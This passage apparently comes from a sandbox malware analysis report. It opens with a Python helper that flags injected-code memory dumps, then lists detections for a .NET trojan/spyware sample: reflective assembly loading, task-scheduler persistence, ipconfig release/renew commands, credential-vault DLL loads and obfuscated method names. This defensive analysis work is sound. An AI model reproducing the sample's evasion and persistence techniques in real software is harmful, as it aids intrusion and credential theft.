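    r"^(?P<proc>[0-9a-f]{8})\.(?P<phase>[0-9a-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<f6>[0-9a-f]{8})\."
    r"(?P<mtype>[0-9a-f]{8})\.(?P<f8>[0-9a-f]{8})\.sdmp$", re.I)
# Unpacked-PE names: <process>.<phase>.<image>.<base hex>.<n>[.raw].unpack
UNPACK = re.compile(
    r"^(?P<proc>\d+)\.(?P<phase>\d+)\.(?P<image>.+?)\.(?P<base>[0-9a-f]+)\.(?P<n>\d+)\.(?:raw\.)?unpack$",
    re.I)


def parse_sdmp(name):
    m = SDMP.match(name)
    if not m:
        raise ValueError(f"not a memory dump name: {name}")
    protect = int(m["protect"], 16) & 0xFF   # drop PAGE_GUARD/NOCACHE/WRITECOMBINE modifiers
    mtype = int(m["mtype"], 16)
    return {
        "process_index": int(m["proc"], 16),
        "phase": int(m["phase"], 16),
        "base": int(m["base"], 16),
        "protect": PAGE_PROTECT.get(protect, hex(protect)),
        "type": MEM_TYPE.get(mtype, hex(mtype)),
    }


def injected_code_candidate(info):
    """Private memory that is both writable and executable is where unpacked
    or injected PEs live; image-backed or read-only regions are not."""
    return info["type"] == "MEM_PRIVATE" and info["protect"] in (
        "PAGE_EXECUTE_READWRITE", "PAGE_EXECUTE_WRITECOPY")


def same_region(sdmp_name, unpack_name):
    """True when an unpacked PE was carved from the given dump (same process,
    phase and base address), e.g. the Costura loader hits in the Yara tables."""
    d, u = parse_sdmp(sdmp_name), UNPACK.match(unpack_name)
    return bool(u) and (int(u["proc"]), int(u["phase"]), int(u["base"], 16)) == (
        d["process_index"], d["phase"], d["base"])


def triage(findings):
    """findings: list of (dump name, string seen in it). Returns the dumps that
    look like injected/unpacked code, with what was found in them."""
    out = []
    for name, what in findings:
        info = parse_sdmp(name)
        if injected_code_candidate(info):
            out.append((name, f"process {info['process_index']} base {info['base']:#x}", what))
    return out


# Dump names and strings copied from the OriginalFilename findings above.
FINDINGS = [
    ("00000000.00000000.857119340.0000000000F59000.00000002.00000001.01000000.00000003.sdmp", "Kqjoqlc.exe"),
    ("00000000.00000002.1153257947.000000000452F000.00000004.00000800.00020000.00000000.sdmp", "77d62c29-4ea5-4d42-a3b6-c31fbd3b2ada.exe"),
    ("00000004.00000002.2105496167.0000000000902000.00000040.00000400.00020000.00000000.sdmp", "77d62c29-4ea5-4d42-a3b6-c31fbd3b2ada.exe"),
    ("00000000.00000002.1160738480.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp", "Microsoft.Win32.TaskScheduler.dll"),
]

if __name__ == "__main__":
    for row in triage(FINDINGS):
        print(row)
```

The same decoding explains the second 77d62c29-... hit in process 0: it sits in a read/write private region (0x452F000), which is the payload still held as data by the loader before it is written into the suspended child and resumed via NtResumeThread.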
                  Source: xnlP06YunJ.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: xnlP06YunJ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: xnlP06YunJ.exe, ConcreteAdapter.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, oH693OIIGFg.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, 1jwN8Qsp0hs.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                  Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, BOM.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, SN5.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, cpjKUanB.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, IicScPhBvUG.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, Q2FNJ519aLQD3XRLdiP.csCryptographic APIs: 'CreateDecryptor'
Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, dyn.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.xnlP06YunJ.exe.4869240.2.raw.unpack, ITaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.xnlP06YunJ.exe.4869240.2.raw.unpack, TaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.xnlP06YunJ.exe.4869240.2.raw.unpack, Task.cs | Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.xnlP06YunJ.exe.4869240.2.raw.unpack, TaskService.cs | Task registration methods: 'CreateFromToken'
Source: 0.2.xnlP06YunJ.exe.4869240.2.raw.unpack, Task.cs | Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.xnlP06YunJ.exe.4869240.2.raw.unpack, User.cs | Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.xnlP06YunJ.exe.4869240.2.raw.unpack, TaskPrincipal.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.xnlP06YunJ.exe.4869240.2.raw.unpack, TaskFolder.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.xnlP06YunJ.exe.4869240.2.raw.unpack, TaskSecurity.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.xnlP06YunJ.exe.4869240.2.raw.unpack, TaskSecurity.cs | Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@13/0@2/2
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2660:120:WilError_03
Source: xnlP06YunJ.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: xnlP06YunJ.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: xnlP06YunJ.exe | Virustotal: Detection: 72%
Source: xnlP06YunJ.exe | ReversingLabs: Detection: 60%
Source: unknown | Process created: C:\Users\user\Desktop\xnlP06YunJ.exe "C:\Users\user\Desktop\xnlP06YunJ.exe"
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Process created: C:\Users\user\Desktop\xnlP06YunJ.exe "C:\Users\user\Desktop\xnlP06YunJ.exe"
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: winsta.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: vaultcli.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: xnlP06YunJ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: xnlP06YunJ.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: xnlP06YunJ.exe | Static file information: File size 1971616 > 1048576
Source: xnlP06YunJ.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x183a00
Source: xnlP06YunJ.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e | source: xnlP06YunJ.exe, 00000000.00000002.1160738480.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp, xnlP06YunJ.exe, 00000000.00000002.1153257947.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, xnlP06YunJ.exe, 00000000.00000002.1153257947.0000000004733000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb | source: xnlP06YunJ.exe, 00000000.00000002.1160738480.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp, xnlP06YunJ.exe, 00000000.00000002.1153257947.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, xnlP06YunJ.exe, 00000000.00000002.1153257947.0000000004733000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq | source: xnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdb | source: xnlP06YunJ.exe, 00000000.00000002.1159805229.0000000006620000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, Q2FNJ519aLQD3XRLdiP.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.xnlP06YunJ.exe.4733420.0.raw.unpack, tiLJlFegcsjJY5bvKoi.cs | .Net Code: Type.GetTypeFromHandle(kY54gRsM9mUt4UfGc7h.Fr9PKyQuA1(16777356)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(kY54gRsM9mUt4UfGc7h.Fr9PKyQuA1(16777255)),Type.GetTypeFromHandle(kY54gRsM9mUt4UfGc7h.Fr9PKyQuA1(16777287))})
Source: xnlP06YunJ.exe, ConcreteAdapter.cs | .Net Code: AdaptExternalAdapter System.Reflection.Assembly.Load(byte[])
Source: 0.2.xnlP06YunJ.exe.4869240.2.raw.unpack, ReflectionHelper.cs | .Net Code: InvokeMethod
Source: 0.2.xnlP06YunJ.exe.4869240.2.raw.unpack, XmlSerializationHelper.cs | .Net Code: ReadObjectProperties
Source: Yara match | File source: 0.2.xnlP06YunJ.exe.5db0000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.xnlP06YunJ.exe.5db0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1158237609.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1141980710.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: xnlP06YunJ.exe PID: 6616, type: MEMORYSTR
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_066A31B9 push esp; iretd 0_2_066A31BC
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06BC9FA9 push cs; ret 0_2_06BC9FAA
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06BC9FE1 push cs; ret 0_2_06BC9FE2
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06BC94E9 push es; ret 0_2_06BC94EA
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06BCC5BE push es; ret 0_2_06BCC5C4
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06BC75A2 push es; retf 0_2_06BC75A8
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06BC95F0 push es; ret 0_2_06BC95F2
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06BC9520 push es; ret 0_2_06BC9522
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06BC9523 push es; ret 0_2_06BC952A
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06BC9569 push es; ret 0_2_06BC956A
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06BC956B push es; ret 0_2_06BC9572
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06BCD0BE push es; retf 0_2_06BCD0D0
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06BCA081 push cs; ret 0_2_06BCA082
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06BCB882 push es; retf 0_2_06BCB888
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06BCA028 push cs; ret 0_2_06BCA02A
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06BCA078 push cs; ret 0_2_06BCA07E
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06BCB92A push es; retf 0_2_06BCB930
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06C44ADB push esp; ret 0_2_06C44AE1
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06C446FA pushfd ; ret 0_2_06C44AD9
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06C44EA8 pushad ; ret 0_2_06C44EA9
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06C42A6B push ebp; ret 0_2_06C42A72
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06C42A29 push esp; ret 0_2_06C42A2A
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06C41FC1 push ecx; ret 0_2_06C41FC2
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06C43FC1 pushad ; ret 0_2_06C43FC2
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06C41FC3 push eax; ret 0_2_06C41FC6
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06C43F81 pushad ; ret 0_2_06C43F82
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06C44008 pushad ; ret 0_2_06C4400A
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06C429E1 push esp; ret 0_2_06C429E2
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06C429E9 push esp; ret 0_2_06C429EA
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 0_2_06C44D43 push esp; ret 0_2_06C44D49
Source: C:\Users\user\Desktop\xnlP06YunJ.exe | Code function: 4_2_064C1021 push es; ret 4_2_064C1024
Source: xnlP06YunJ.exe | Static PE information: section name: .text entropy: 7.806883109554231
Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, oH693OIIGFg.cs | High entropy of concatenated method names: 'Xyaca7TjH9r8ujdrrjl', 'AwbYvITAKsFvwdxR3ud', 'XFWbm3TbDbv1GlUCDtG', 'k9HQ68TMqEn6UCm7cQJ', 'Grab', 'xMZg90LFcT', 'gsNgt5GrEX', 'bEOgncqr8p', 'LrXIETT9Q1sVUpmW4MS', 's2gCbVTtYmZes2mikyQ'
Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, 1RmE4.cs | High entropy of concatenated method names: 'ReleaseHandle', 'JhdrbFTfyPpsbD7X5N9', 'SciD8XTVYxfxZqTHPPP', 'RegOpenKeyEx', 'RegCloseKey', 'RegQueryValueEx', 's4myi0TWhErCShaZBrD', 'GhWeBKT3fJx2hgIHGFT', 'Grab', 'xL3b71TlAXCINK4BMf0'
Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, Q2FNJ519aLQD3XRLdiP.cs | High entropy of concatenated method names: 'el8cZa2Bj7WUrDfoGnH', 'WKiffG2cBprZsynkmrB', 'OIj5Ppk7iA', 'vh0ry9Sq2v', 'pFq5Y4cbyF', 'JO658oU7LE', 'GMF5QF5ASt', 'EUQ5zj6mZO', 'xyIJKwqHCk', 'bFm1nNr3T1'
Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, oYiON3.cs | High entropy of concatenated method names: 'f4Hw9ow795', 'lNMwtlaHdP', 'jhawn3YIfC', 'ZUa', 'P5IX3BG', 'JfWDY', '_8WQtAGzX', 'qRrwjqBqdM', 'EHXwAkFitP', 'tTLwuv4onS'
Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, sc1GAGO7.cs | High entropy of concatenated method names: 'H6wQKiL1W1hg4vMYFpu', 'fRZEkWL5Kmfnmq5X4yX', 'iXYP', 'KxxZ9EnF', 'MgAvPqe0', 'keIjIjhkNWj', 'KM1XL1z6', 'Asy', '_1VE2K', 'OlIjOE6'
Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, uIOyrjgmj4VibKGvHxW.cs | High entropy of concatenated method names: 'y4bwx0eIit', 'V5UwRAWD2J', 'QW4wwCou6D', 'gN6w0Bo0Ga', 'Xaiw58nEyt', 'x1ywDDikq4', 'CdaPQOF0mu8UieWhIoL', 'vxHYSJF1svDoZC9K42h', 'A8OgkixAht', 'AHO046FR3jMSXdBXHNs'
Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, m3NjPDDLiSGRFVZ5Xij.cs | High entropy of concatenated method names: 'JaiDMpuvGa', 'b4ND4tcBrI', 'uH4D75vj6G', 'RebDvuQITy', 'q0yDdmFtCG', 'MOBDpT748A', 'GZZDBZ0YNZ', 'zMJDcqUA1c', 'luyDNi8aCn', 'xoRDEeuXs6'
Source: 0.2.xnlP06YunJ.exe.452f3a0.4.raw.unpack, bOL8YNwGWNXPaSJfSjW.cs | High entropy of concatenated method names: 'qpQwiRuf4p', 'tOtwkkb3hV', 'kM8wYR4Aqb', 'Nvnw8Iava4', 'hI7wzGGWbg', 'qTM0x1c03S', 'OEq0gcxPS6', 'Upr0wJfaQ2', 'o8F01IEhJQ', 'x5505xnfwd'
Source: 0.2.xnlP06YunJ.exe.5980000.5.raw.unpack, JaR1TLbKvV3KQlwEEf6.cs | High entropy of concatenated method names: 'x6Vbe65AaY', 'MQAbsxC4KE', 'Tc2b0oVdXU', 'e7sbwS2Jds', 'OF3buvqJGu', 'ke6bEtuqt2', 'UPGbGeADEf', 'umxbpjYUb8', 'KkmbaWVSSG', 'iSDbZOxwm9'
Source: 0.2.xnlP06YunJ.exe.4733420.0.raw.unpack, opM1EgsDhQbDcOCE5Bu.cs | High entropy of concatenated method names: 'p97stdejne', 'Vj4s8U1Xpb', 'NoksTBlhXE', 'bN9s2gDMTF', 'wSHsx9VjF8', 'OndsPhmso1', 'skRsCGLf6s', 'Clws9kYD77', 'JQmsSBcwUa', 'crNsXWpfKA'
Source: 0.2.xnlP06YunJ.exe.4733420.0.raw.unpack, C4LZocsJmUFZM3f0wej.cs | High entropy of concatenated method names: 'dU2HAukkjU', 'MDVHzBWdAl', 'HGNEfjcgK7', 'aMeEbmWvLL', 'rA5EhMaKks', 'kxqEOqRm1V', 'DfRE6JNSDp', 'WeNcEHZZpD', 'xZqEiJOF5q', 'YYnEdnjglL'
Source: 0.2.xnlP06YunJ.exe.4733420.0.raw.unpack, tiLJlFegcsjJY5bvKoi.cs | High entropy of concatenated method names: 'HJxQhOTdJnuFWxPE3le', 'mbf0dUTmIxaouRSvt1g', 'dfusqa2bab', 'vh0ry9Sq2v', 'DPqs0hh2g3', 'lGusLvGdLx', 'uGeswmuZOp', 'GyisNSe7HQ', 'Fe9P1whZbC', 'i6LeWP3AHy'
Source: 0.2.xnlP06YunJ.exe.4733420.0.raw.unpack, JaR1TLbKvV3KQlwEEf6.cs | High entropy of concatenated method names: 'x6Vbe65AaY', 'MQAbsxC4KE', 'Tc2b0oVdXU', 'e7sbwS2Jds', 'OF3buvqJGu', 'ke6bEtuqt2', 'UPGbGeADEf', 'umxbpjYUb8', 'KkmbaWVSSG', 'iSDbZOxwm9'
Source: 0.2.xnlP06YunJ.exe.4733420.0.raw.unpack, zXtqTfytwsUqV0HbShR.cs | High entropy of concatenated method names: 'qkkyPcuqL7', 'KJryC1eARu', 'G6Xy9S23QF', 'aBAySfsy7p', 'MrVyXWpnD5', 'FJNyJf7jQa', 'Fv5yAiQLQc', 'tvfyzPeXnR', 'RcHefgvMfZ', 'RlxebrdJHq'
